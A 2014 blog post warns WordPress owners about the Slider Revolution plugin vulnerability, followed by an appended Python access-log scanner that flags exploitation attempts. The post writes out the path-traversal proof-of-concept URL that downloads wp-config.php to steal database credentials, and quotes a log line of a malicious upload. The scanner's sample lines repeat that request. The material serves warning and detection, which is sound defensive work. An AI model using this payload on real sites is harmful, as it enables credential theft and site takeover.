Month: December 2014

New Year's Eve: Ended Up Fixing a Hacked Website Instead :/


If you run a WordPress site with paid themes that use the Slider Revolution plugin (revslider), be careful: there is a fairly critical bug that gives an attacker a way in to mess up your blog.

The proof of concept shared via underground sites shows how someone can easily download the wp-config.php:

http://victim.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

This is used to steal the database credentials, which then allows you to compromise the website via the database.

more: http://blog.sucuri.net/2014/09/slider-revolution-plugin-critical-vulnerability-being-exploited.html

Exploit: If the discovery phase is successful and they find a site using Revslider, they use a second vulnerability in Revslider and attempt to upload a malicious theme to the site:

94.153.8.126 - - [14/Dec/2014:04:31:28 -0500] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 4183 "-"
Content-Disposition: form-data; revslider_ajax_action
update_plugin; name="update_file";…

more: http://blog.sucuri.net/2014/12/revslider-vulnerability-leads-to-massive-wordpress-soaksoak-compromise.html

So go check your WordPress blogs; one of the themes you use might bundle this plugin ;))
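One way to check a web server access log for the two requests quoted above, as an added example that is not from the original post or from Sucuri's write-ups. It assumes the Apache/Nginx combined log format; the function names, the heuristic (an `img` value containing `..` or ending in `.php`) and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined log format prefix: ip, timestamp, method, URL, status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

def classify(line):
    """Return (ip, kind, detail) for a request worth reviewing, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, _ts, method, url, status = m.groups()
    parts = urlsplit(url)
    if not parts.path.endswith("/wp-admin/admin-ajax.php"):
        return None
    qs = parse_qs(parts.query)  # also percent-decodes, so ..%2F becomes ../
    if "revslider_show_image" in qs.get("action", []):
        img = qs.get("img", [""])[0]
        # Heuristic (assumption): a slider image is never a PHP file or a parent path
        if ".." in img or img.lower().endswith(".php"):
            return (ip, "file-read", f"img={img} status={status}")
    elif method == "POST":
        # Common legitimate traffic; only meaningful next to a file-read hit
        return (ip, "ajax-post", f"status={status}")
    return None

def scan(lines):
    """Report IPs that requested a file via revslider_show_image, and
    whether the same IP later POSTed to admin-ajax.php."""
    per_ip = {}
    for line in lines:
        hit = classify(line)
        if hit:
            per_ip.setdefault(hit[0], []).append(hit[1:])
    report = {}
    for ip, hits in per_ip.items():
        kinds = [k for k, _ in hits]
        if "file-read" in kinds:
            report[ip] = {
                "file_reads": [d for k, d in hits if k == "file-read"],
                "post_after_read": "ajax-post" in kinds[kinds.index("file-read"):],
            }
    return report

# Constructed sample lines (documentation IP ranges), not real traffic
SAMPLE = [
    '203.0.113.7 - - [14/Dec/2014:04:30:01 -0500] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 200 3120 "-" "-"',
    '203.0.113.7 - - [14/Dec/2014:04:31:28 -0500] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 4183 "-" "-"',
    '198.51.100.9 - - [14/Dec/2014:04:32:00 -0500] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=..%2Fwp-config.php HTTP/1.1" 200 3120 "-" "-"',
    '192.0.2.4 - - [14/Dec/2014:04:33:00 -0500] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 58 "-" "-"',
    '192.0.2.5 - - [14/Dec/2014:04:34:00 -0500] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=uploads/slide1.jpg HTTP/1.1" 200 9000 "-" "-"',
]
```

A 200 response to a flagged `file-read` request means the database credentials in wp-config.php should be treated as exposed and rotated; a POST from the same IP afterwards is a reason to review the site's theme and plugin files for changes.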
